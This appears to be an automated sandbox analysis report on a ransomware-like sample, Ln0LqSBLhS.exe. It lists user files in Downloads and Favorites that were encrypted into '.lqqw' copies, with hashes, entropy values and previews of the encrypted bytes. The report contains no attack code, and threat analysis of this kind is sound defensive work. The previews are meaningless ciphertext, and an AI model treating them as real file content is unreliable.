                                                                                                                                                                                                    Preview: ...y..$\.......e..-.b.}..:~...V>.n....O....4H...6h..K....!...../......jHo."......;.L..!Vmt.O.u......C...UE...&6......v..T|..w.*.b...._...kT.MRr...3T.V.._%..X.$8...}.....x...4Fv. ..9.s......^O.M#+..m...L.C...V.....yptY....+.$..F.....];:&!x........U_..pQ.:..<.8.5..$[...Q....-..[./..Y..5...`.......(....%A... )..."......S..c..*.s.5.x..WE........Vm.w..%@..2.v.....B.\.>.......-.>....D;..$.r.I.m.......9.X}..p._Wi.k&..4..,.l*5.b"5B.....W.Y..yD. ..a&.^.5.j.PP..u..-..l9..L..A....Q...I...{....rW...H..]r]._.......O......&r...-... ..Jjx<."5.T.m.M..d.....mm:.`.xW.9%.M2...-...71.'..1..B...}..+1..w.V...........&/!..B...~..m.,...............H...%.Nn....4........b..(..t..4.......BN.W.Ch..2.9JW.\..X.b.\.S.\......w.J..n.LI....f..r.a... zT.E0.~..+..+...r..........r...<dvm..-2....+,....S..g,q..e....@a.F={.,~..pt.....'%.Y6.N&..g[..k.k..`T].h{.:......2.._._n........5.Ls...k..6.x.c.^...\@.DW2j )...c.#k.........v............p..... ...0vd..Zb.O..P..7C..b.......
                                                                                                                                                                                                    C:\Users\user\Downloads\QCOILOQIKC.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.841497192406158
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/BBv3USL2EWCibV3XA7iJgcYis+rInr7GvR2q0ptK/gwwAeFyN8Z7bD:/BGSLsbVHA7iJgcYisu0riv49p4gwwA4
                                                                                                                                                                                                    MD5:A9442B8A4CC20BC4B1D0EE15F42212E0
                                                                                                                                                                                                    SHA1:880D5EB2D5D34FCFD0C087572B73F756133CD32B
                                                                                                                                                                                                    SHA-256:FEE953CEB3A952520FFE1133FA583772FE39801916EDB2D8F3637BFAA54CC7BC
                                                                                                                                                                                                    SHA-512:F905EF1D87E3462C75DA798A570641E8785E45DB48D106BF70074D8EB1769AE4389A3C7D7245CE91CC4521AB0C94894B7B2471EE259DF0DA376846FCA95690E3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: M...:..uV;...s.....J.|Z..n.G..............S....9q..#c.n}/CY|.L....I.:I....F.L.s...!OQ../k.sac....m@....A.p.)k.^...Z9..K.r.I.o`...D..qp.R`....'.m.l.@.m^.+.>.\...(3t....W.W...P...>......4/..$i.P..d.Jgp ..|.....wZzqW.."..s.$E..."....2y.....U...~.0....B...).7... .u...gY...gH.r.rHN/..r,7n{.&....cR....->|.U?;0u.C0zY.f......:..y...O..A<.eA.8..z../UYD..*..Q..I............0nZG.g.:S..!.....2.)#[N]S3.u.....[...E..L.....".-...t4.}......Y........>.....=....,#.".S.h..CB....h...O#.........YY.p....S.4..M.-.Y..&.......{....?.1i.e...#..G1....hmD.w4..O?.. Q..0b.3.N....M.7.2....Z.u..g..+.+%l.O%.lT.'b"..Z.".a#...P".....T.."...Va...C`.h......<..].,J.z.0uz?...u<J....F1..EB..2,..*.$.=....)9.............H.'.....W.$....#M....>.]~.1....b..R5hes?.Y6..52.p..U..=..[.n9B....8f..`PAq..[./.B.......2..Q..$.e...PW..8.L .{.....y..P...w..}.....13-...-K.H....TK...'.Y.L=..f..$........O..L.......4_.?.g.g$.F..O`...&7.i[....O.Z.....+{Qi.}...".atT(0y.h.r.X....=..Z......_0X.`....SC..z.
                                                                                                                                                                                                    C:\Users\user\Downloads\QCOILOQIKC.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.841497192406158
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/BBv3USL2EWCibV3XA7iJgcYis+rInr7GvR2q0ptK/gwwAeFyN8Z7bD:/BGSLsbVHA7iJgcYisu0riv49p4gwwA4
                                                                                                                                                                                                    MD5:A9442B8A4CC20BC4B1D0EE15F42212E0
                                                                                                                                                                                                    SHA1:880D5EB2D5D34FCFD0C087572B73F756133CD32B
                                                                                                                                                                                                    SHA-256:FEE953CEB3A952520FFE1133FA583772FE39801916EDB2D8F3637BFAA54CC7BC
                                                                                                                                                                                                    SHA-512:F905EF1D87E3462C75DA798A570641E8785E45DB48D106BF70074D8EB1769AE4389A3C7D7245CE91CC4521AB0C94894B7B2471EE259DF0DA376846FCA95690E3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: M...:..uV;...s.....J.|Z..n.G..............S....9q..#c.n}/CY|.L....I.:I....F.L.s...!OQ../k.sac....m@....A.p.)k.^...Z9..K.r.I.o`...D..qp.R`....'.m.l.@.m^.+.>.\...(3t....W.W...P...>......4/..$i.P..d.Jgp ..|.....wZzqW.."..s.$E..."....2y.....U...~.0....B...).7... .u...gY...gH.r.rHN/..r,7n{.&....cR....->|.U?;0u.C0zY.f......:..y...O..A<.eA.8..z../UYD..*..Q..I............0nZG.g.:S..!.....2.)#[N]S3.u.....[...E..L.....".-...t4.}......Y........>.....=....,#.".S.h..CB....h...O#.........YY.p....S.4..M.-.Y..&.......{....?.1i.e...#..G1....hmD.w4..O?.. Q..0b.3.N....M.7.2....Z.u..g..+.+%l.O%.lT.'b"..Z.".a#...P".....T.."...Va...C`.h......<..].,J.z.0uz?...u<J....F1..EB..2,..*.$.=....)9.............H.'.....W.$....#M....>.]~.1....b..R5hes?.Y6..52.p..U..=..[.n9B....8f..`PAq..[./.B.......2..Q..$.e...PW..8.L .{.....y..P...w..}.....13-...-K.H....TK...'.Y.L=..f..$........O..L.......4_.?.g.g$.F..O`...&7.i[....O.Z.....+{Qi.}...".atT(0y.h.r.X....=..Z......_0X.`....SC..z.
                                                                                                                                                                                                    C:\Users\user\Downloads\TQDFJHPUIU.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.836224234703214
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:2B9KG4Srr2rPdpVhlOhKdE9E7N44rS4FphJhHhOp51HJEwaDH7hbD:XGLCrFpndEm7m4rPJw5qbxD
                                                                                                                                                                                                    MD5:743B6506992CDF49FC6831A1E9B6D647
                                                                                                                                                                                                    SHA1:C7487CF78A65BFAE3BBF0E9E9EE1DC209524027B
                                                                                                                                                                                                    SHA-256:ED97B08BA9CCC4AE972F22AB13AE138EC286E0BC50D685D1F9F790E0D888F9B6
                                                                                                                                                                                                    SHA-512:BB856701F725D9672F6A02EB742C125AC3F2DFEFEC29369CDED789944F056D3139B0E64A3FDE699DD7FC9877B1AD0C2431CE73E3E7DFAE53FF5A0F38500E9912
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....|Cs....M...DR..4...D.........0B .....$...ZmMc.yP,...v..8.......-!.7...j^....Jr.R.. .....q.X....."mi...\.sweU%2.....k...8T...Z...+.&......D.:.i[...^.T.-.....K^p.d..{.....%......s....P...)....3..'. .=!...h..A......bL.._.....ne ...7..3...Jw ...;....d5.v..IG.x.M..5.>..-F-d....9..Z.@5i.V/.....-..{,..,..&.:..|.N..A.D.X.'.Td....JE?5..@.s..._&(.2!..{I.rws.s<x|.!.b....j"X.}VY...hmV.......Y.=u/I..o...:.`.....M..g3p..Z.y'.M...F.Y06O..5........fd.O.Um......l~T.=6.&8[.........&..B.H..f..5.5FQ....c.?]{>..*.=W.(9.Ph!.;Z..;.~N..0r.X..3O......p..Y..[=..).}../6m........H.C_$...=..Y.....<%a..*~.....:..O.W.|.T.G.F.K.m...b..|.f?".O.b.:....T...P,f....bZ-.L..Z.0D.........%.?...Tfkh. .3T.>........."...W..+.q....)x<:}t(P.{.m....PW.4b.....U..U8o....8..P.Y..D.f.....i.5.}.........i.).n.......G.M+...k...[{3Aew..t?L.h..d./.<A..?j}..x.V.`-.......;.7$...V._......'.%..2..-..o......'F#.p....'.v..XY...X....[.g.....Cd.I...t....,.x..o8....6....G0..S..&C...9.......NG...
                                                                                                                                                                                                    C:\Users\user\Downloads\TQDFJHPUIU.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.836224234703214
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:2B9KG4Srr2rPdpVhlOhKdE9E7N44rS4FphJhHhOp51HJEwaDH7hbD:XGLCrFpndEm7m4rPJw5qbxD
                                                                                                                                                                                                    MD5:743B6506992CDF49FC6831A1E9B6D647
                                                                                                                                                                                                    SHA1:C7487CF78A65BFAE3BBF0E9E9EE1DC209524027B
                                                                                                                                                                                                    SHA-256:ED97B08BA9CCC4AE972F22AB13AE138EC286E0BC50D685D1F9F790E0D888F9B6
                                                                                                                                                                                                    SHA-512:BB856701F725D9672F6A02EB742C125AC3F2DFEFEC29369CDED789944F056D3139B0E64A3FDE699DD7FC9877B1AD0C2431CE73E3E7DFAE53FF5A0F38500E9912
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....|Cs....M...DR..4...D.........0B .....$...ZmMc.yP,...v..8.......-!.7...j^....Jr.R.. .....q.X....."mi...\.sweU%2.....k...8T...Z...+.&......D.:.i[...^.T.-.....K^p.d..{.....%......s....P...)....3..'. .=!...h..A......bL.._.....ne ...7..3...Jw ...;....d5.v..IG.x.M..5.>..-F-d....9..Z.@5i.V/.....-..{,..,..&.:..|.N..A.D.X.'.Td....JE?5..@.s..._&(.2!..{I.rws.s<x|.!.b....j"X.}VY...hmV.......Y.=u/I..o...:.`.....M..g3p..Z.y'.M...F.Y06O..5........fd.O.Um......l~T.=6.&8[.........&..B.H..f..5.5FQ....c.?]{>..*.=W.(9.Ph!.;Z..;.~N..0r.X..3O......p..Y..[=..).}../6m........H.C_$...=..Y.....<%a..*~.....:..O.W.|.T.G.F.K.m...b..|.f?".O.b.:....T...P,f....bZ-.L..Z.0D.........%.?...Tfkh. .3T.>........."...W..+.q....)x<:}t(P.{.m....PW.4b.....U..U8o....8..P.Y..D.f.....i.5.}.........i.).n.......G.M+...k...[{3Aew..t?L.h..d./.<A..?j}..x.V.`-.......;.7$...V._......'.%..2..-..o......'F#.p....'.v..XY...X....[.g.....Cd.I...t....,.x..o8....6....G0..S..&C...9.......NG...
                                                                                                                                                                                                    C:\Users\user\Downloads\TQDFJHPUIU.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.854918828389765
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:5IZ/T8Eh5OOrwrolIHUMgJbMJFrKDUOt4eeAK3kDg6CDHhv8bD:52r8EOO0roNL6P2petUDgfHxWD
                                                                                                                                                                                                    MD5:46BFA25942E07732840F950416D3CB01
                                                                                                                                                                                                    SHA1:58D880DC5F0ABE50E045A23B9A69A5F3A5F8025F
                                                                                                                                                                                                    SHA-256:BB52321182B6F3298CE9EE6B3536D82DC7707573303FC2189F2F58B2B36DA0AD
                                                                                                                                                                                                    SHA-512:2A741A92A2A389F71F76DFE214211ECFD0AD63C043C6B8B5C3BE88F7BFFDAE3B26B27C914A5AD197DE2278167AB0F02150B2890A4CAB5CF2981ECB1343ED35DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..;#:.~..."..%..C. ..zAKa=.=_.<t....(Y4@......7_..-5.D.7O.?..U.<i,w}^4/.F..5..HT..z7.ntb.NH...$ ..,...TS.Z.-...Q....K....q./.....)..9".e..5.....}.5.t..^1G.....M.....d=.P70..7........'.`*Pb..J..-.U<. ....L.|)&....X....]..j._.&..jc.r....v.Hf..e......r.n..a.....+.h.Sj.s+F...Ah,......Z....%.L.&.....!.0_)..Eh=.FU.....P....P...Q............}:.[./......wH.j..y;.k|......k.R.............|.-...L.Q.o,.Yc.....M...F..."0*..B.e.U...5H....;X6..~.@`Z..Z...{..I.......P..J+.%2_.:.9 M.....~>.........-Z.7.....~...y+o........_/.....uw.6y..a<..|.......N|Mv......\.M.6.T..h.........&|..do....o.LR....o.....P.?....c....../aJ.HqN.....`M.e...*.9...@.G....MB......B..0.%.6...&L...jm.x....~#_nQ'$.K=.qB)...c(..Js.p.>N".:*t.<...O...v.q.~e........!.5....\<b.o...{.0c;G.cY......Y.U.6#..._.x....5.R5.X.A...>.s@.Q....U..]'......R.!rc...fU...s..d...s.5.........'...wP.q.'.....h~..... {4..{.&.gu..u..sSSB.b.R.<YG?J%I.].<1~.NF.K...U..Xc....P(.D0.S.]M....Lv^..{hw.3.~..=..?`xop..]
                                                                                                                                                                                                    C:\Users\user\Downloads\TQDFJHPUIU.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.854918828389765
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:5IZ/T8Eh5OOrwrolIHUMgJbMJFrKDUOt4eeAK3kDg6CDHhv8bD:52r8EOO0roNL6P2petUDgfHxWD
                                                                                                                                                                                                    MD5:46BFA25942E07732840F950416D3CB01
                                                                                                                                                                                                    SHA1:58D880DC5F0ABE50E045A23B9A69A5F3A5F8025F
                                                                                                                                                                                                    SHA-256:BB52321182B6F3298CE9EE6B3536D82DC7707573303FC2189F2F58B2B36DA0AD
                                                                                                                                                                                                    SHA-512:2A741A92A2A389F71F76DFE214211ECFD0AD63C043C6B8B5C3BE88F7BFFDAE3B26B27C914A5AD197DE2278167AB0F02150B2890A4CAB5CF2981ECB1343ED35DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..;#:.~..."..%..C. ..zAKa=.=_.<t....(Y4@......7_..-5.D.7O.?..U.<i,w}^4/.F..5..HT..z7.ntb.NH...$ ..,...TS.Z.-...Q....K....q./.....)..9".e..5.....}.5.t..^1G.....M.....d=.P70..7........'.`*Pb..J..-.U<. ....L.|)&....X....]..j._.&..jc.r....v.Hf..e......r.n..a.....+.h.Sj.s+F...Ah,......Z....%.L.&.....!.0_)..Eh=.FU.....P....P...Q............}:.[./......wH.j..y;.k|......k.R.............|.-...L.Q.o,.Yc.....M...F..."0*..B.e.U...5H....;X6..~.@`Z..Z...{..I.......P..J+.%2_.:.9 M.....~>.........-Z.7.....~...y+o........_/.....uw.6y..a<..|.......N|Mv......\.M.6.T..h.........&|..do....o.LR....o.....P.?....c....../aJ.HqN.....`M.e...*.9...@.G....MB......B..0.%.6...&L...jm.x....~#_nQ'$.K=.qB)...c(..Js.p.>N".:*t.<...O...v.q.~e........!.5....\<b.o...{.0c;G.cY......Y.U.6#..._.x....5.R5.X.A...>.s@.Q....U..]'......R.!rc...fU...s..d...s.5.........'...wP.q.'.....h~..... {4..{.&.gu..u..sSSB.b.R.<YG?J%I.].<1~.NF.K...U..Xc....P(.D0.S.]M....Lv^..{hw.3.~..=..?`xop..]
                                                                                                                                                                                                    C:\Users\user\Downloads\ZGGKNSUKOP.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.846039021978032
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:MGOtFYbuV7TT5/lU4S/yY3Iz/ztUVVXpwWQnPyxFa/0KbD:atf/TdlU4S/j4z/zWs7MoD
                                                                                                                                                                                                    MD5:D00205294C9CCE00C6D69E198D842175
                                                                                                                                                                                                    SHA1:90A55D1BD40D9F9F491D37703DC54D508AB0C522
                                                                                                                                                                                                    SHA-256:87D44174CAA7F9B9BDD818D30047342CA1A5C39F972550186E4FE07AA96B2034
                                                                                                                                                                                                    SHA-512:78C0EDF145E48286F46ED899380B2D6A43D6D225D60BBD6F236765FDEDAB3ED1CA13515C94C12F2C89B87AE0BF8F9D0C0F0AB4A02D757EDB7D3F03C0F0BFB81E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....2.\.,.2n.lV..z......Ts.9..L)\....-...m..d.....Fr..!..sAE....d..<.9.rJ.).f.e&.k.5O...w...i.*.K...2w..........O.0.}mE.<2.q..5..O..s..d...b}...yC/..........V.........0.t.<...-......"j.20....b..b...I5.K...@}.......#..1...:.`...+..M......S.5.b2.fI....DF|.V....R\...."..X......;.`.#g.F.l..d..D..Or...S.Y'..).%..{..Lnk...-z[... .e..EVD..63....^.o....s....Aa-..MC...OL.NO=.....n..x.8.)`.T^P.8.?y[.ox..3...PK.!.}..j..u.<\..N..4...$.=|;....Y...'..#.uG.0.4............!.>.......F..~}c@......c%n&h.]...i.*.E9.~.7]u:..7.=....^.q..%>..].L..........6f@.|c.....1...+a.).............?,..X.'fg.B".J{.....%>..)..k.S.....B%..@......i_...}1<..Dm..(P..%.._.p.#....2r=ow......(...=..G.8.&.9Zd.>Y[4$k.r......{~.m.0.._.A..;!jo..I.Q.x..........n.._i.x..H.h.j..P.x..K.?.....d....>.....OI].`.......q._..6.0.o7......y.;..[..(....'.q.'@&.z.......6.n.y...?.S~aX...vk..h.^.->.%QqH`/.....$[F...6......T;/.. iN....45.[....o@3..$..>..R...yT.3.(..a.V.D-.K.....(A!c......
                                                                                                                                                                                                    C:\Users\user\Downloads\ZGGKNSUKOP.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.846039021978032
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:MGOtFYbuV7TT5/lU4S/yY3Iz/ztUVVXpwWQnPyxFa/0KbD:atf/TdlU4S/j4z/zWs7MoD
                                                                                                                                                                                                    MD5:D00205294C9CCE00C6D69E198D842175
                                                                                                                                                                                                    SHA1:90A55D1BD40D9F9F491D37703DC54D508AB0C522
                                                                                                                                                                                                    SHA-256:87D44174CAA7F9B9BDD818D30047342CA1A5C39F972550186E4FE07AA96B2034
                                                                                                                                                                                                    SHA-512:78C0EDF145E48286F46ED899380B2D6A43D6D225D60BBD6F236765FDEDAB3ED1CA13515C94C12F2C89B87AE0BF8F9D0C0F0AB4A02D757EDB7D3F03C0F0BFB81E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....2.\.,.2n.lV..z......Ts.9..L)\....-...m..d.....Fr..!..sAE....d..<.9.rJ.).f.e&.k.5O...w...i.*.K...2w..........O.0.}mE.<2.q..5..O..s..d...b}...yC/..........V.........0.t.<...-......"j.20....b..b...I5.K...@}.......#..1...:.`...+..M......S.5.b2.fI....DF|.V....R\...."..X......;.`.#g.F.l..d..D..Or...S.Y'..).%..{..Lnk...-z[... .e..EVD..63....^.o....s....Aa-..MC...OL.NO=.....n..x.8.)`.T^P.8.?y[.ox..3...PK.!.}..j..u.<\..N..4...$.=|;....Y...'..#.uG.0.4............!.>.......F..~}c@......c%n&h.]...i.*.E9.~.7]u:..7.=....^.q..%>..].L..........6f@.|c.....1...+a.).............?,..X.'fg.B".J{.....%>..)..k.S.....B%..@......i_...}1<..Dm..(P..%.._.p.#....2r=ow......(...=..G.8.&.9Zd.>Y[4$k.r......{~.m.0.._.A..;!jo..I.Q.x..........n.._i.x..H.h.j..P.x..K.?.....d....>.....OI].`.......q._..6.0.o7......y.;..[..(....'.q.'@&.z.......6.n.y...?.S~aX...vk..h.^.->.%QqH`/.....$[F...6......T;/.. iN....45.[....o@3..$..>..R...yT.3.(..a.V.D-.K.....(A!c......
                                                                                                                                                                                                    C:\Users\user\Favorites\Amazon.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                    Entropy (8bit):7.484581534237486
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:f9g1I34nb0cVLVziSne6NNHWT5JUV0ZZhn+TfX5BKjK33fqsH75dExcii96Z:b60kxek+G0Fn+T5oK3Pq7cii9a
                                                                                                                                                                                                    MD5:7F7E253FEDAB63FF4425D32AB3D07DB1
                                                                                                                                                                                                    SHA1:4DED0EDDD3BCB59E79A5009B878D6DE40BF46676
                                                                                                                                                                                                    SHA-256:E9A50E28BBFB89FC063CE34AE93D45B69832DEF0544C67DF2A3CE8F003FE0BC4
                                                                                                                                                                                                    SHA-512:4A667ABF97BB9B006100B47A3EFED13F9F23DAA4C4EEA5B6211D68DDBAF846DB0636AF6C410DB8FADC20D321B778A6ADE2FE34E05C84E439410DBADF7134A2FA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....j.b...7...|....D..$..,.n.....un....8.9.....'....*....B...S..........L...I<KIZ..j.....?...H._........TnG..W.WK.Wa.A.0OFi..J...O.0le.YW.Z..7.p..{%.,...h..ex["..k.....(..n...(q].h.4......Me..v...U#vd.U.5092.....:...M8.e.../y......=..._....r.>..gX....s.Q....j1nv..M...= .zQ..... ...).'..k..O.........6..~.T...7..E..G[q..)c:.....E..]?........5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Amazon.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):440
                                                                                                                                                                                                    Entropy (8bit):7.484581534237486
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:f9g1I34nb0cVLVziSne6NNHWT5JUV0ZZhn+TfX5BKjK33fqsH75dExcii96Z:b60kxek+G0Fn+T5oK3Pq7cii9a
                                                                                                                                                                                                    MD5:7F7E253FEDAB63FF4425D32AB3D07DB1
                                                                                                                                                                                                    SHA1:4DED0EDDD3BCB59E79A5009B878D6DE40BF46676
                                                                                                                                                                                                    SHA-256:E9A50E28BBFB89FC063CE34AE93D45B69832DEF0544C67DF2A3CE8F003FE0BC4
                                                                                                                                                                                                    SHA-512:4A667ABF97BB9B006100B47A3EFED13F9F23DAA4C4EEA5B6211D68DDBAF846DB0636AF6C410DB8FADC20D321B778A6ADE2FE34E05C84E439410DBADF7134A2FA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....j.b...7...|....D..$..,.n.....un....8.9.....'....*....B...S..........L...I<KIZ..j.....?...H._........TnG..W.WK.Wa.A.0OFi..J...O.0le.YW.Z..7.p..{%.,...h..ex["..k.....(..n...(q].h.4......Me..v...U#vd.U.5092.....:...M8.e.../y......=..._....r.>..gX....s.Q....j1nv..M...= .zQ..... ...).'..k..O.........6..~.T...7..E..G[q..)c:.....E..]?........5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Bing.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):537
                                                                                                                                                                                                    Entropy (8bit):7.481563586887792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:/amZ9/rvcBAQDbudRM7iTJk1JLAFJW/p1naIiRwNcii9a:/asFzJsUELAgCtR8bD
                                                                                                                                                                                                    MD5:D145CEFB78700EAFFC106A3F0705943E
                                                                                                                                                                                                    SHA1:028F83B33726E0E036C7ABE372D9B32549E99BB8
                                                                                                                                                                                                    SHA-256:5028E228A6A4E8B41EA5D59B0BD5D9AF39100BFEBCEA4A94E99994EECA2AB13C
                                                                                                                                                                                                    SHA-512:D7F8F105E61F1EB194F8BB01765EE5649E63EE708BFAC275979C97BF00EC384BC364E0F5BC3F1F992B91713270C2B4F1E85C36F86885444CD7ADEE39F6DF95B3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .. F.6....O..d........V.0U6...A.wM.qN.j....Mi'.-<.9l.{.....[...(...N...28... ....#O..n..|.~..E =..k..K"(..4........ ....".|+.[J...C ...)......'..a_n.Y....u...^+.......Kp.<..../Ve{...2........1.i.".....t.d...r.f]M..M.s3.......0...G...p_..b".K.D....a.i.CQ.o..i...Q4....f.H.2..H.."mk...]?...._....(N.<..*F..h.....9.0.p\uY....{.....n...q..q...7v/T[S.-2..?.!1J.RF..2..."O...".t...j.;..w.Fn..r......t.(;L..D1..?.....HV...a....8.....K.O...I.....X5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Bing.url.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):537
                                                                                                                                                                                                    Entropy (8bit):7.481563586887792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:/amZ9/rvcBAQDbudRM7iTJk1JLAFJW/p1naIiRwNcii9a:/asFzJsUELAgCtR8bD
                                                                                                                                                                                                    MD5:D145CEFB78700EAFFC106A3F0705943E
                                                                                                                                                                                                    SHA1:028F83B33726E0E036C7ABE372D9B32549E99BB8
                                                                                                                                                                                                    SHA-256:5028E228A6A4E8B41EA5D59B0BD5D9AF39100BFEBCEA4A94E99994EECA2AB13C
                                                                                                                                                                                                    SHA-512:D7F8F105E61F1EB194F8BB01765EE5649E63EE708BFAC275979C97BF00EC384BC364E0F5BC3F1F992B91713270C2B4F1E85C36F86885444CD7ADEE39F6DF95B3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .. F.6....O..d........V.0U6...A.wM.qN.j....Mi'.-<.9l.{.....[...(...N...28... ....#O..n..|.~..E =..k..K"(..4........ ....".|+.[J...C ...)......'..a_n.Y....u...^+.......Kp.<..../Ve{...2........1.i.".....t.d...r.f]M..M.s3.......0...G...p_..b".K.D....a.i.CQ.o..i...Q4....f.H.2..H.."mk...]?...._....(N.<..*F..h.....9.0.p\uY....{.....n...q..q...7v/T[S.-2..?.!1J.RF..2..."O...".t...j.;..w.Fn..r......t.(;L..D1..?.....HV...a....8.....K.O...I.....X5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Favorites\Facebook.url
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):442
                                                                                                                                                                                                    Entropy (8bit):7.491168822192405
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:OOUF8RxWN9PWfheDxngyz/1sNjvUcii9a:OB8RxY9PwheDxngks5cbD
                                                                                                                                                                                                    MD5:CCA489FFE84EC1FAB144CE1F26D72834
                                                                                                                                                                                                    SHA1:BCD3063530639F7F61EC6F0018346192FCAB5BC7
                                                                                                                                                                                                    SHA-256:8B04A2A90388BFBF1FBDFB5ECE652A6AA5AD650BA7E8C40B0BCC6BD20F6F01A3
                                                                                                                                                                                                    SHA-512:38B483DC34943FBA620FB0FF10C93D836A4979C4F952C8824C84FA902023F7E822B8FBE9E2D6353EA54B0ABDABA14A2DFE7CFF8B69BE154B94A406EBA4AF9073
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
